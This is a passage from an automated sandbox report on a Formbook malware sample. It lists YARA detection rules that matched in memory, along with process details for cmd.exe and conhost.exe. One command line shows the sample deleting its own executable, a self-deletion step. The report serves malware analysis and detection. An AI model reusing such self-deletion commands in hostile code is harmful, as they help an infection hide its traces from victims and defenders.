                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate

                                                                          Analysis Process: cmd.exe PID: 4928 Parent PID: 5708

                                                                          General

                                                                          Start time:10:02:52
                                                                          Start date:12/04/2021
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
                                                                          Imagebase:0x2a0000
                                                                          File size:232960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Analysis Process: conhost.exe PID: 952 Parent PID: 4928

                                                                          General

                                                                          Start time:10:02:53
                                                                          Start date:12/04/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff61de10000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >